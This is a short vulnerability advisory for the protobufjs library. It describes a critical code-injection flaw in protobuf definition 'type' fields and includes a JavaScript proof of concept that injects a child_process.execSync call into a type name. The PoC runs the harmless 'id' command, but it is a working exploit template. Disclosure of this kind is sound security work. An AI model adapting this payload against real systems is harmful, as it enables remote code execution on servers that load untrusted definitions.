Severity: Critical
CVSS Score: 9.4
### Summary protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code. ### Details Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition. ### PoC ```js const protobuf = require('protobufjs'); maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`) const root = protobuf.Root.fromJSON(maliciousDescriptor); const UserType = root.lookupType("User"); const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]); try { const user = UserType.decode(userBytes); } catch (e) {} ``` ### Impact Remote code execution when attackers can control the protobuf definition files.